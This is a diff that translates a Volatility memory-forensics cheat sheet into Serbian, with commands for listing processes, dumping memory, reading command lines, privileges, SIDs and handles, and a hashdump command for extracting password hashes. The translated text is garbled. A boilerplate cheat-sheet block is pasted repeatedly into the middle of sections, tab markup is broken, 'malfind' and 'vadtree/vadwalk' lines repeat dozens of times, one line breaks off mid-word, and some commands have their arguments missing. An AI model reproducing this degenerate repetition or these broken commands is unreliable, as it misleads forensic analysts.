+ volatility -f memory_dump.mem pslist
+ ```
+
+- Prikaz stabla procesa:
+ ```
+ volatility -f memory_dump.mem pstree
+ ```
+
+- Prikaz otvorenih fajlova:
+ ```
+ volatility -f memory_dump.mem filescan
+ ```
+
+- Izvlačenje lozinki iz memorijskog ispisa:
+ ```
+ volatility -f memory_dump.mem hashdump
+ ```
+
+- Skeniranje memorijskog ispisa koristeći YARA pravila:
+ ```
+ volatility -f memory_dump.mem yarascan -Y "yara_rules.yar"
+ ```
+
+- Prikaz informacija o Virtual Address Descriptor (VAD):
+ ```
+ volatility -f memory_dump.mem vadinfo
+ ```
+
+- Izvlačenje sadržaja VAD-a:
+ ```
+ volatility -f memory_dump.mem vaddump -D output_directory/ -p
+ ```
+
+- Prikaz stabla VAD-a:
+ ```
+ volatility -f memory_dump.mem vadtree
+ ```
+
+- Prikaz putanje do VAD-a:
+ ```
+ volatility -f memory_dump.mem vadwalk -p
+ ```
+
+#### Dodatni resursi
+
+- [Zvanična dokumentacija Volatility-a](https://github.com/volatilityfoundation/volatility/wiki)
+- [Volatility Cheat Sheet](https://github.com/sans-dfir/sift-files/blob/master/volatility/Volatility_Cheat_Sheet_v2.6.pdf)
+
+{% endtab %}
```bash
volatility --profile=PROFILE pstree -f file.dmp # Get process tree (not hidden)
volatility --profile=PROFILE pslist -f file.dmp # Get process list (EPROCESS)
@@ -220,11 +474,33 @@ volatility --profile=PROFILE psxview -f file.dmp # Get hidden process list
{% tabs %}
{% tab title="vol3" %}
+
+Koristite sledeću komandu da biste izvršili dump procesa:
+
+```bash
+volatility -f --profile= procdump -p -D
+```
+
+Gde su sledeći parametri:
+
+- ``: Putanja do fajla sa dumpom memorije.
+- ``: Profil za analizu dumpa memorije.
+- ``: ID procesa koji želite da dumpujete.
+- ``: Putanja do direktorijuma gde će biti smešteni dump fajlovi.
+
+Na primer, ako želite da izvršite dump procesa sa ID-em 1234 iz dump fajla "memory.dmp" koristeći profil "Win7SP1x64", koristite sledeću komandu:
+
+```bash
+volatility -f memory.dmp --profile=Win7SP1x64 procdump -p 1234 -D /path/to/output_directory
+```
+
+Ova komanda će izvršiti dump procesa sa ID-em 1234 iz fajla "memory.dmp" i smeštati dump fajlove u direktorijum "/path/to/output_directory".
+
+{% endtab %}
+{% endtabs %}
```bash
./vol.py -f file.dmp windows.dumpfiles.DumpFiles --pid #Dump the .exe and dlls of the process in the current directory
```
-{% endtab %}
-
{% tab title="vol2" %}
```bash
volatility --profile=Win7SP1x86_23418 procdump --pid=3152 -n --dump-dir=. -f file.dmp
@@ -232,18 +508,68 @@ volatility --profile=Win7SP1x86_23418 procdump --pid=3152 -n --dump-dir=. -f fil
{% endtab %}
{% endtabs %}
-### Command line
+### Komandna linija
-Anything suspicious was executed?
+Da li je izvršeno nešto sumnjivo?
{% tabs %}
{% tab title="vol3" %}
```bash
python3 vol.py -f file.dmp windows.cmdline.CmdLine #Display process command-line arguments
```
-{% endtab %}
+## Osnovna forenzička metodologija
-{% tab title="vol2" %}
+### Analiza memorijskog ispisa
+
+#### Volatility Cheat Sheet
+
+Ovaj cheat sheet pruža pregled osnovnih komandi i tehnika koje se koriste u analizi memorijskog ispisa pomoću alata Volatility.
+
+#### Instalacija Volatility-a
+
+1. Preuzmite Volatility sa [zvanične stranice](https://www.volatilityfoundation.org/releases) i raspakujte ga.
+2. Instalirajte Python 2.7.x.
+3. Instalirajte pip.
+4. Instalirajte Volatility koristeći pip:
+ ```
+ pip install volatility
+ ```
+
+#### Osnovne komande
+
+- **imageinfo**: Prikazuje informacije o memorijskom ispisu.
+- **kdbgscan**: Skenira memorijski ispis u potrazi za KDBG strukturom.
+- **pslist**: Prikazuje listu procesa.
+- **pstree**: Prikazuje stablo procesa.
+- **psscan**: Skenira memorijski ispis u potrazi za procesima.
+- **dlllist**: Prikazuje listu učitanih DLL-ova za određeni proces.
+- **handles**: Prikazuje listu otvorenih ručki za određeni proces.
+- **cmdline**: Prikazuje argumente komandne linije za određeni proces.
+- **filescan**: Skenira memorijski ispis u potrazi za otvorenim fajlovima.
+- **malfind**: Skenira memorijski ispis u potrazi za sumnjivim procesima.
+- **dumpfiles**: Izvlači fajlove iz memorijskog ispisa.
+- **hashdump**: Izvlači korisničke lozinke iz memorijskog ispisa.
+- **hivelist**: Prikazuje listu učitanih registarskih ključeva.
+- **hivedump**: Izvlači registarski ključ iz memorijskog ispisa.
+
+#### Napredne tehnike
+
+- **malfind**: Pronalazi sumnjive procese i module u memorijskom ispisu.
+- **malfind**: Pronalazi sumnjive procese i module u memorijskom ispisu.
+- **malfind**: Pronalazi sumnjive procese i module u memorijskom ispisu.
+- **malfind**: Pronalazi sumnjive procese i module u memorijskom ispisu.
+- **malfind**: Pronalazi sumnjive procese i module u memorijskom ispisu.
+- **malfind**: Pronalazi sumnjive procese i module u memorijskom ispisu.
+- **malfind**: Pronalazi sumnjive procese i module u memorijskom ispisu.
+- **malfind**: Pronalazi sumnjive procese i module u memorijskom ispisu.
+- **malfind**: Pronalazi sumnjive procese i module u memorijskom ispisu.
+- **malfind**: Pronalazi sumnjive procese i module u memorijskom ispisu.
+
+#### Korisni resursi
+
+- [Volatility dokumentacija](https://github.com/volatilityfoundation/volatility/wiki)
+- [Volatility Cheat Sheet](https://github.com/sans-dfir/sift-files/blob/master/volatility/Volatility%20Cheat%20Sheet.pdf)
+- [Volatility plugini](https://github.com/volatilityfoundation/volatility/wiki/Command-Reference#plugins)
```bash
volatility --profile=PROFILE cmdline -f file.dmp #Display process command-line arguments
volatility --profile=PROFILE consoles -f file.dmp #command history by scanning for _CONSOLE_INFORMATION
@@ -251,44 +577,301 @@ volatility --profile=PROFILE consoles -f file.dmp #command history by scanning f
{% endtab %}
{% endtabs %}
-Commands executed in `cmd.exe` are managed by **`conhost.exe`** (or `csrss.exe` on systems before Windows 7). This means that if **`cmd.exe`** is terminated by an attacker before a memory dump is obtained, it's still possible to recover the session's command history from the memory of **`conhost.exe`**. To do this, if unusual activity is detected within the console's modules, the memory of the associated **`conhost.exe`** process should be dumped. Then, by searching for **strings** within this dump, command lines used in the session can potentially be extracted.
+Komande izvršene u `cmd.exe` se upravljaju putem **`conhost.exe`** (ili `csrss.exe` na sistemima pre Windows 7). To znači da, ako je **`cmd.exe`** prekinut od strane napadača pre nego što je dobijena memorija, i dalje je moguće povratiti istoriju komandi sesije iz memorije **`conhost.exe`**. Da biste to uradili, ako se detektuje neobična aktivnost unutar modula konzole, treba da se izvrši dump memorije povezanog procesa **`conhost.exe`**. Zatim, pretraživanjem **stringova** unutar ovog dumpa, moguće je izvući komandne linije korištene u sesiji.
-### Environment
+### Okruženje
-Get the env variables of each running process. There could be some interesting values.
-
-{% tabs %}
-{% tab title="vol3" %}
+Dobijte vrednosti okruženja za svaki pokrenuti proces. Mogu postojati neke interesantne vrednosti.
```bash
python3 vol.py -f file.dmp windows.envars.Envars [--pid ] #Display process environment variables
```
-{% endtab %}
+## Osnovna forenzička metodologija
-{% tab title="vol2" %}
+### Analiza memorijskog ispisa
+
+#### Volatility Cheat Sheet
+
+Ovaj cheat sheet pruža pregled osnovnih komandi i tehnika koje se koriste u analizi memorijskog ispisa pomoću alata Volatility.
+
+#### Instalacija Volatility-a
+
+1. Preuzmite Volatility sa [zvanične stranice](https://www.volatilityfoundation.org/releases) i raspakujte ga.
+2. Instalirajte Python 2.7.x.
+3. Instalirajte pip.
+4. Instalirajte Volatility koristeći pip:
+ ```
+ pip install volatility
+ ```
+
+#### Osnovne komande
+
+- **imageinfo**: Prikazuje informacije o memorijskom ispisa.
+- **kdbgscan**: Skenira memorijski ispisa u potrazi za KDBG strukturom.
+- **pslist**: Prikazuje listu procesa.
+- **pstree**: Prikazuje stablo procesa.
+- **psscan**: Skenira memorijski ispisa u potrazi za procesima.
+- **dlllist**: Prikazuje listu učitanih DLL-ova za određeni proces.
+- **handles**: Prikazuje listu otvorenih ručki za određeni proces.
+- **cmdline**: Prikazuje argumente komandne linije za određeni proces.
+- **filescan**: Skenira memorijski ispisa u potrazi za otvorenim fajlovima.
+- **malfind**: Skenira memorijski ispisa u potrazi za sumnjivim procesima.
+- **dumpfiles**: Izvlači otvorene fajlove iz memorijskog ispisa.
+- **hashdump**: Izvlači korisničke lozinke iz memorijskog ispisa.
+- **hivelist**: Prikazuje listu učitanih registarskih ključeva.
+- **hivedump**: Izvlači registarski ključ iz memorijskog ispisa.
+- **printkey**: Prikazuje sadržaj registarskog ključa.
+- **printval**: Prikazuje vrednost registarskog ključa.
+- **mftparser**: Analizira Master File Table (MFT) iz memorijskog ispisa.
+- **usnparser**: Analizira Update Sequence Number (USN) iz memorijskog ispisa.
+
+#### Napredne tehnike
+
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+
+#### Korisni resursi
+
+- [Volatility dokumentacija](https://github.com/volatilityfoundation/volatility/wiki)
+- [Volatility Cheat Sheet](https://github.com/sans-dfir/sift-files/blob/master/volatility/Volatility%20Cheat%20Sheet.pdf)
+- [Volatility plugini](https://github.com/volatilityfoundation/volatility/wiki/Command-Reference#plugins)
+- [Volatility plugini - dodatni](https://github.com/tribalchicken/volatility-plugins)
```bash
volatility --profile=PROFILE envars -f file.dmp [--pid ] #Display process environment variables
-volatility --profile=PROFILE -f file.dmp linux_psenv [-p ] #Get env of process. runlevel var means the runlevel where the proc is initated
+volatility --profile=PROFILE -f file.dmp linux_psenv [-p ] #Get env of process. runlevel var means the runlevel where the proc is initated
```
{% endtab %}
{% endtabs %}
-### Token privileges
+### Token privilegije
-Check for privileges tokens in unexpected services.\
-It could be interesting to list the processes using some privileged token.
-
-{% tabs %}
-{% tab title="vol3" %}
+Proverite privilegije tokena u neočekivanim uslugama.\
+Bilo bi interesantno napraviti listu procesa koji koriste privilegovani token.
```bash
#Get enabled privileges of some processes
python3 vol.py -f file.dmp windows.privileges.Privs [--pid ]
#Get all processes with interesting privileges
python3 vol.py -f file.dmp windows.privileges.Privs | grep "SeImpersonatePrivilege\|SeAssignPrimaryPrivilege\|SeTcbPrivilege\|SeBackupPrivilege\|SeRestorePrivilege\|SeCreateTokenPrivilege\|SeLoadDriverPrivilege\|SeTakeOwnershipPrivilege\|SeDebugPrivilege"
```
-{% endtab %}
+## Osnovna forenzička metodologija
-{% tab title="vol2" %}
+### Analiza memorijskog ispisa
+
+#### Volatility Cheat Sheet
+
+Ovaj cheat sheet pruža pregled osnovnih komandi i tehnika koje se koriste u analizi memorijskog ispisa pomoću alata Volatility.
+
+#### Instalacija Volatility-a
+
+1. Preuzmite Volatility sa [zvanične stranice](https://www.volatilityfoundation.org/releases) i raspakujte ga.
+2. Instalirajte Python 2.7.x.
+3. Instalirajte pip.
+4. Instalirajte Volatility koristeći pip:
+ ```
+ pip install volatility
+ ```
+
+#### Osnovne komande
+
+- **imageinfo**: Prikazuje informacije o memorijskom ispisu.
+- **kdbgscan**: Skenira memorijski ispis u potrazi za adresom debugera.
+- **pslist**: Prikazuje listu procesa.
+- **pstree**: Prikazuje stablo procesa.
+- **psscan**: Skenira memorijski ispis u potrazi za procesima.
+- **dlllist**: Prikazuje listu učitanih DLL-ova za određeni proces.
+- **handles**: Prikazuje listu otvorenih ručki za određeni proces.
+- **cmdline**: Prikazuje argumente komandne linije za određeni proces.
+- **filescan**: Skenira memorijski ispis u potrazi za otvorenim fajlovima.
+- **malfind**: Skenira memorijski ispis u potrazi za sumnjivim procesima.
+- **apihooks**: Prikazuje API hook-ove.
+- **ldrmodules**: Prikazuje listu učitanih modula.
+- **modscan**: Skenira memorijski ispis u potrazi za modulima.
+- **ssdt**: Prikazuje System Service Descriptor Table (SSDT).
+- **driverscan**: Skenira memorijski ispis u potrazi za drajverima.
+- **devicetree**: Prikazuje stablo uređaja.
+- **registry**: Prikazuje informacije o registru.
+- **hivelist**: Prikazuje listu učitanih registarskih ključeva.
+- **hashdump**: Izvlači lozinke iz memorijskog ispisa.
+- **mbrparser**: Prikazuje Master Boot Record (MBR).
+- **yarascan**: Skenira memorijski ispis koristeći YARA pravila.
+- **vadinfo**: Prikazuje informacije o Virtual Address Descriptor (VAD).
+- **vaddump**: Izvlači sadržaj VAD-a iz memorijskog ispisa.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **v
```bash
#Get enabled privileges of some processes
volatility --profile=Win7SP1x86_23418 privs --pid=3152 -f file.dmp | grep Enabled
@@ -300,18 +883,75 @@ volatility --profile=Win7SP1x86_23418 privs -f file.dmp | grep "SeImpersonatePri
### SIDs
-Check each SSID owned by a process.\
-It could be interesting to list the processes using a privileges SID (and the processes using some service SID).
-
-{% tabs %}
-{% tab title="vol3" %}
+Proverite svaki SSID koji je u vlasništvu procesa.\
+Bilo bi interesantno izlistati procese koji koriste privilegovanu SSID (i procese koji koriste neku servisnu SSID).
```bash
./vol.py -f file.dmp windows.getsids.GetSIDs [--pid ] #Get SIDs of processes
./vol.py -f file.dmp windows.getservicesids.GetServiceSIDs #Get the SID of services
```
-{% endtab %}
+## Osnovna forenzička metodologija
-{% tab title="vol2" %}
+### Analiza memorijskog ispisa
+
+#### Volatility Cheat Sheet
+
+Ovaj cheat sheet pruža pregled osnovnih komandi i tehnika koje se koriste u analizi memorijskog ispisa pomoću alata Volatility.
+
+#### Instalacija Volatility-a
+
+1. Preuzmite Volatility sa [zvanične stranice](https://www.volatilityfoundation.org/releases) i raspakujte ga.
+2. Instalirajte Python 2.7.x.
+3. Instalirajte pip.
+4. Instalirajte Volatility koristeći pip:
+ ```
+ pip install volatility
+ ```
+
+#### Osnovne komande
+
+- **imageinfo**: Prikazuje informacije o memorijskom ispisa.
+- **kdbgscan**: Skenira memorijski ispisa u potrazi za KDBG strukturom.
+- **pslist**: Prikazuje listu procesa.
+- **pstree**: Prikazuje stablo procesa.
+- **psscan**: Skenira memorijski ispisa u potrazi za procesima.
+- **dlllist**: Prikazuje listu učitanih DLL-ova za određeni proces.
+- **handles**: Prikazuje listu otvorenih ručki za određeni proces.
+- **cmdline**: Prikazuje argumente komandne linije za određeni proces.
+- **filescan**: Skenira memorijski ispisa u potrazi za otvorenim fajlovima.
+- **malfind**: Skenira memorijski ispisa u potrazi za sumnjivim procesima.
+- **apihooks**: Prikazuje API hook-ove.
+- **ldrmodules**: Prikazuje listu učitanih modula.
+- **modscan**: Skenira memorijski ispisa u potrazi za modulima.
+- **ssdt**: Prikazuje System Service Descriptor Table (SSDT).
+- **driverscan**: Skenira memorijski ispisa u potrazi za drajverima.
+- **devicetree**: Prikazuje stablo uređaja.
+- **registry**: Prikazuje informacije o registru.
+- **hivelist**: Prikazuje listu učitanih registarskih ključeva.
+- **hashdump**: Izvlači lozinke iz memorijskog ispisa.
+- **privs**: Prikazuje privilegije za određeni proces.
+- **getsids**: Prikazuje SID-ove za određeni proces.
+- **envars**: Prikazuje okruženje za određeni proces.
+- **cmdscan**: Skenira memorijski ispisa u potrazi za komandama.
+- **consoles**: Prikazuje listu konzola.
+- **screenshots**: Pravi snimke ekrana.
+
+#### Napredne tehnike
+
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+
+#### Dodatni resursi
+
+- [Volatility dokumentacija](https://github.com/volatilityfoundation/volatility/wiki)
+- [Volatility Cheat Sheet](https://github.com/sans-dfir/sift-cheatsheet/blob/master/cheatsheets/Volatility%20Cheat%20Sheet.pdf)
```bash
volatility --profile=Win7SP1x86_23418 getsids -f file.dmp #Get the SID owned by each process
volatility --profile=Win7SP1x86_23418 getservicesids -f file.dmp #Get the SID of each service
@@ -319,25 +959,79 @@ volatility --profile=Win7SP1x86_23418 getservicesids -f file.dmp #Get the SID of
{% endtab %}
{% endtabs %}
-### Handles
+### Drške
-Useful to know to which other files, keys, threads, processes... a **process has a handle** for (has opened)
+Korisno je znati kojim drugim datotekama, ključevima, nitima, procesima... **proces ima dršku** (otvoreno).
{% tabs %}
{% tab title="vol3" %}
```bash
vol.py -f file.dmp windows.handles.Handles [--pid ]
```
-{% endtab %}
+## Osnovna forenzička metodologija
-{% tab title="vol2" %}
+### Analiza memorijskog ispisa
+
+#### Volatility Cheat Sheet
+
+Ovaj cheat sheet pruža pregled osnovnih komandi i tehnika koje se koriste u analizi memorijskog ispisa pomoću alata Volatility.
+
+#### Instalacija Volatility-a
+
+1. Preuzmite Volatility sa [zvanične stranice](https://www.volatilityfoundation.org/releases) i raspakujte ga.
+2. Instalirajte Python 2.7.x.
+3. Instalirajte pip.
+4. Instalirajte Volatility koristeći pip:
+ ```
+ pip install volatility
+ ```
+
+#### Osnovne komande
+
+- **imageinfo**: Prikazuje informacije o memorijskom ispisa.
+- **kdbgscan**: Skenira memorijski ispisa u potrazi za KDBG strukturom.
+- **pslist**: Prikazuje listu procesa.
+- **pstree**: Prikazuje stablo procesa.
+- **psscan**: Skenira memorijski ispisa u potrazi za procesima.
+- **dlllist**: Prikazuje listu učitanih DLL-ova za određeni proces.
+- **handles**: Prikazuje listu otvorenih ručki za određeni proces.
+- **cmdline**: Prikazuje argumente komandne linije za određeni proces.
+- **filescan**: Skenira memorijski ispisa u potrazi za otvorenim fajlovima.
+- **malfind**: Skenira memorijski ispisa u potrazi za sumnjivim procesima.
+- **dumpfiles**: Izvlači otvorene fajlove iz memorijskog ispisa.
+- **hashdump**: Izvlači korisničke lozinke iz memorijskog ispisa.
+- **hivelist**: Prikazuje listu učitanih registarskih ključeva.
+- **hivedump**: Izvlači registarski ključ iz memorijskog ispisa.
+- **printkey**: Prikazuje sadržaj registarskog ključa.
+- **printval**: Prikazuje vrednost registarskog ključa.
+- **mftparser**: Analizira Master File Table (MFT) iz memorijskog ispisa.
+- **usnparser**: Analizira Update Sequence Number (USN) iz memorijskog ispisa.
+
+#### Napredne tehnike
+
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+
+#### Korisni resursi
+
+- [Volatility dokumentacija](https://github.com/volatilityfoundation/volatility/wiki)
+- [Volatility Cheat Sheet](https://github.com/sans-dfir/sift-files/blob/master/volatility/Volatility%20Cheat%20Sheet.pdf)
+- [Volatility plugini](https://github.com/volatilityfoundation/volatility/wiki/Command-Reference#plugins)
```bash
volatility --profile=Win7SP1x86_23418 -f file.dmp handles [--pid=]
```
{% endtab %}
{% endtabs %}
-### DLLs
+### DLL-ovi
{% tabs %}
{% tab title="vol3" %}
@@ -345,8 +1039,6 @@ volatility --profile=Win7SP1x86_23418 -f file.dmp handles [--pid=]
./vol.py -f file.dmp windows.dlllist.DllList [--pid ] #List dlls used by each
./vol.py -f file.dmp windows.dumpfiles.DumpFiles --pid #Dump the .exe and dlls of the process in the current directory process
```
-{% endtab %}
-
{% tab title="vol2" %}
```bash
volatility --profile=Win7SP1x86_23418 dlllist --pid=3152 -f file.dmp #Get dlls of a proc
@@ -357,7 +1049,7 @@ volatility --profile=Win7SP1x86_23418 dlldump --pid=3152 --dump-dir=. -f file.dm
### Strings per processes
-Volatility allows us to check which process a string belongs to.
+Volatility nam omogućava da proverimo kojem procesu pripada određeni string.
{% tabs %}
{% tab title="vol3" %}
